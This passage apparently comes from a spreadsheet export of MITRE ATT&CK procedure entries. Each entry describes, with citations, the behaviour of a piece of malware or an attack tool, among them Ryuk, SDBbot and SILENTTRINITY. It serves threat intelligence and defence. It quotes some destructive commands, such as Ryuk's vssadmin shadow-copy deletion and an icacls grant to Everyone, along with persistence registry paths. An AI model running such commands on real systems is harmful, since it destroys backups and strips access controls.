    <t>[Rover](https://attack.mitre.org/software/S0090) searches for files on local drives based on a predefined list of file extensions.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) searches for files on attached removable drives based on a predefined list of file extensions every five seconds.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) automatically searches for files on local drives based on a predefined list of file extensions.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) has keylogging functionality.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) copies files from removable drives to &lt;code&gt;C:\system&lt;/code&gt;.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) has functionality to remove Registry Run key persistence as a cleanup procedure.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) persists by creating a Registry entry in &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt;.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) takes screenshots of the compromised system's desktop and saves them to &lt;code&gt;C:\system\screenshot.bmp&lt;/code&gt; for exfiltration every 60 minutes.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Ruler](https://attack.mitre.org/software/S0358) can be used to enumerate Exchange users and dump the GAL.(Citation: SensePost Ruler GitHub)</t>
  </si>
  <si>
    <t>[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Forms to establish persistence.(Citation: SensePost Ruler GitHub)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Home Pages to establish persistence.(Citation: SensePost Ruler GitHub) </t>
  </si>
  <si>
    <t xml:space="preserve">[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Rules to establish persistence.(Citation: SensePost Ruler GitHub) </t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to compress files.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to clear event logs.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to open and copy data from the clipboard.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) kills antimalware running process.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to delete files from the victim’s machine.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) captures keystrokes and sends them back to the C2 server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) adds itself to the Registry key &lt;code&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; to establish persistence upon reboot.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) gathers the OS version, logical drives information, processor information, and volume information.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) uses a batch file to kill a security program task and then attempts to remove itself.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has attempted to adjust its token privileges to have the &lt;code&gt;SeDebugPrivilege&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has stopped services related to anti-virus.(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can use stolen domain admin accounts to move laterally within a victim domain.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ryuk](https://attack.mitre.org/software/S0446) has enumerated files and folders on all mounted drives.(Citation: CrowdStrike Ryuk January 2019)	</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used &lt;code&gt;vssadmin Delete Shadows /all /quiet&lt;/code&gt; to to delete volume shadow copies and &lt;code&gt;vssadmin resize shadowstorage&lt;/code&gt; to force deletion of shadow copies created by third-party applications.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can create .dll files that actually contain a Rich Text File format document.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has constructed legitimate appearing installation folder paths by calling &lt;code&gt;GetWindowsDirectoryW&lt;/code&gt; and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as &lt;code&gt;C:\Users\Public&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used multiple native APIs including &lt;code&gt;ShellExecuteW&lt;/code&gt; to run executables,&lt;code&gt;GetWindowsDirectoryW&lt;/code&gt; to create folders, and &lt;code&gt;VirtualAlloc&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, and &lt;code&gt;CreateRemoteThread&lt;/code&gt; for process injection.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can use anti-disassembly and code transformation obfuscation techniques.(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;CreateToolhelp32Snapshot&lt;/code&gt; to enumerate all running processes.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has injected itself into remote processes to encrypt files using a combination of &lt;code&gt;VirtualAlloc&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used the Windows command line to create a Registry entry under &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; to establish persistence.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used the C$ network share for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can remotely create a scheduled task to execute itself on a system.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;kill.bat&lt;/code&gt; for stopping services, disabling services and killing processes.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;GetLogicalDrives&lt;/code&gt; to emumerate all mounted drives, and &lt;code&gt;GetDriveTypeW&lt;/code&gt; to determine the drive type.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has been observed to query the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language&lt;/code&gt; and the value &lt;code&gt;InstallLanguage&lt;/code&gt;. If the machine has the value 0x419 (Russian), 0x422 (Ukrainian), or 0x423 (Belarusian), it stops execution.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;GetIpNetTable&lt;/code&gt; in attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries.(Citation: CrowdStrike Ryuk January 2019)(Citation: Bleeping Computer - Ryuk WoL) </t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used Wake-on-Lan to power on turned off systems for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used &lt;code&gt;cmd.exe&lt;/code&gt; to create a Registry entry to establish persistence.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can launch &lt;code&gt;icacls &lt;path&gt; /grant Everyone:F /T /C /Q&lt;/code&gt; to delete every access-based restrictions on files and directories.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has uploaded data and files from a compromised host to its C2 servers.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has deleted files it has created on a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has deleted accounts it has created.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) can download additional files onto a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has run the command `net user` on a victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may create a temporary user on the system named `Lost_{Unique Identifier}` with the password `pond~!@6”{Unique Identifier}`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may save itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has used Windows APIs, including `GetKeyboardType`, `NetUserAdd`, and `NetUserDel`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ IMJPMIJ8.1{3 characters of Unique Identifier}&lt;/code&gt;.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may create the file &lt;code&gt;%HOMEPATH%\Start Menu\Programs\Startup\Realtek {Unique Identifier}.lnk&lt;/code&gt;, which points to the malicious `msdtc.exe` file already created in the `%CommonFiles%` directory.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>Some [S-Type](https://attack.mitre.org/software/S0085) samples have been packed with UPX.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) uses Base64 encoding for C2 traffic.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>The initial beacon packet for [S-Type](https://attack.mitre.org/software/S0085) contains the operating system version and file system of the victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has attempted to determine if a compromised system was using a Japanese keyboard via the `GetKeyboardType` API call.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has used `ipconfig /all` on a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has run tests to determine the privilege level of the compromised user.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) runs the command &lt;code&gt;net start&lt;/code&gt; on a victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) uses HTTP for C2.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has provided the ability to execute shell commands on a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use application shimming for persistence if it detects it is running as admin on Windows XP or 7, by creating a shim database to patch services.exe.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to access the file system on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to decrypt and decompress its payload to enable code execution.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to inject a downloaded DLL into a newly created rundll32.exe process.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has sent collected data from a compromised host to its C2 servers.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to delete files from a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to get directory listings or drive information on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to clean up and remove data structures from a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to download a DLL from C2 to a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to communicate with C2 with TCP over port 443.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to XOR the strings for its installer component with a hardcoded 128 byte key.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) can enumerate a list of running processes on a compromised machine.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use port forwarding to establish a proxy between a target host and C2.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to add a value to the Registry Run key to establish persistence if it detects it is running with regular user privilege. (Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use RDP to connect to victim's machines.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has used rundll32.exe to execute DLLs.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has used a packed installer file.(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to identify the OS version, OS bit information and computer name.(Citation: Proofpoint TA505 October 2019)(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) can collected the country code of a compromised machine.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to determine the domain name and whether a proxy is configured on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to identify the user on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to record video on a compromised host.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use the command shell to execute commands on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDelete](https://attack.mitre.org/software/S0195) deletes data in a way that makes it unrecoverable.(Citation: Microsoft SDelete July 2016)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) can download remote files onto victims.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) can timestomp files on victims using a Web shell.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) can execute commands on victims.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to upload and download files.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has used base64 encoding and XOR to obfuscate PowerShell scripts.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to employ a custom PowerShell script.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the IP address, machine name, and OS of the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the domain of the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the current date and time on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHIPSHAPE](https://attack.mitre.org/software/S0028) achieves persistence by creating a shortcut in the Startup folder.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[APT30](https://attack.mitre.org/groups/G0013) may have used the [SHIPSHAPE](https://attack.mitre.org/software/S0028) malware to move onto air-gapped networks. [SHIPSHAPE](https://attack.mitre.org/software/S0028) targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to obtain a directory listing.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to retrieve information about connected users.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) is obscured using XOR encoding and appended to a valid GIF file.(Citation: FireEye Clandestine Wolf)(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to obtain a process listing.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) uses [netstat](https://attack.mitre.org/software/S0104) to list TCP connection status.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can download and execute an arbitary executable.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can capture screenshots.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can collect system information.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can enumerate the active Window during keylogging through execution of `GetActiveWindowTitle`.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[SILENTTRINITY](https://attack.mitre.org/software/S0692) contains a number of modules that can bypass UAC, including through Window's Device Manager, Manage Optional Features, and an image hijack on the `.msc` file extension.(Citation: GitHub SILENTTRINITY Modules July 2019)   </t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can conduct an image hijack of an `.msc` file extension as part of its UAC bypass process.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can add a CLSID key for payload execution through `Registry.CurrentUser.CreateSubKey("Software\\Classes\\CLSID\\{" + clsid + "}\\InProcServer32")`.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can collect clear text web credentials for Internet Explorer/Edge.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692)'s `amsiPatch.py` module can disable Antimalware Scan Interface (AMSI) functions.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use `System` namespace methods to execute lateral movement using DCOM.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use `System.Security.AccessControl` namespaces to retrieve domain user information.(Citation: GitHub SILENTTRINITY Modules July 2019)  </t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use `System.DirectoryServices` namespace to retrieve domain group information.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can transfer files from an infected host to the C2 server.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can remove files from the compromised host.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[SILENTTRINITY](https://attack.mitre.org/software/S0692) has several modules, such as `ls.py`, `pwd.py`, and `recentFiles.py`, to enumerate directories and files.(Citation: GitHub SILENTTRINITY Modules July 2019) </t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692)'s `credphisher.py` module can prompt a current user for their credentials.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[SILENTTRINITY](https://attack.mitre.org/software/S0692) has a module that can extract cached GPP passwords.(Citation: GitHub SILENTTRINITY Modules July 2019) </t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) has the ability to set its window state to hidden.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can bypass ScriptBlock logging to execute unmanaged PowerShell code from memory.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can remove artifacts from the compromised host, including created Registry keys.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can load additional files and tools, including [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) contains a module to conduct Kerberoasting.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) has a keylogging capability.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can create a memory dump of LSASS via the `MiniDumpWriteDump Win32` API call.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can obtain a list of local groups and members.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can modify registry keys, including to enable or disable Remote Desktop Protocol (RDP).(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) has the ability to leverage API including `GetProcAddress` and `LoadLibrary`.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can scan for open ports on a compromised machine.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can enumerate shares on a compromised host.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use PowerShell to execute commands.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can enumerate processes, including properties to determine if they have the Common Language Runtime (CLR) loaded.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can inject shellcode directly into Excel.exe or a specific process.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) is written in Python and can use multiple Python scripts for execution on targeted systems.(Citation: GitHub SILENTTRINITY March 2022)(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use the `GetRegValue` function to check Registry keys within `HKCU\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` and `HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated`. It also contains additional modules that can check software AutoRun values and use the Win32 namespace to get values from HKCU, HKLM, HKCR, and HKCC hives.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can establish a LNK file in the startup folder for persistence.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can enumerate and collect the properties of domain computers.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can take a screenshot of the current desktop.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can determine if an anti-virus product is installed through the resolution of the service's virtual SID.(Citation: Security Affairs SILENTTRINITY July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can collect information related to a compromised host, including OS version and a list of drives.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[SILENTTRINITY](https://attack.mitre.org/software/S0692) can gather a list of logged on users.(Citation: GitHub SILENTTRINITY Modules July 2019) </t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can search for modifiable services that could be used for privilege escalation.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can collect start time information from a compromised host.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can find a process owned by a specific user and impersonate the associated token.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use `cmd.exe` to enable lateral movement using DCOM.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[SILENTTRINITY](https://attack.mitre.org/software/S0692) can gather Windows Vault credentials.(Citation: GitHub SILENTTRINITY Modules July 2019) </t>
  </si>
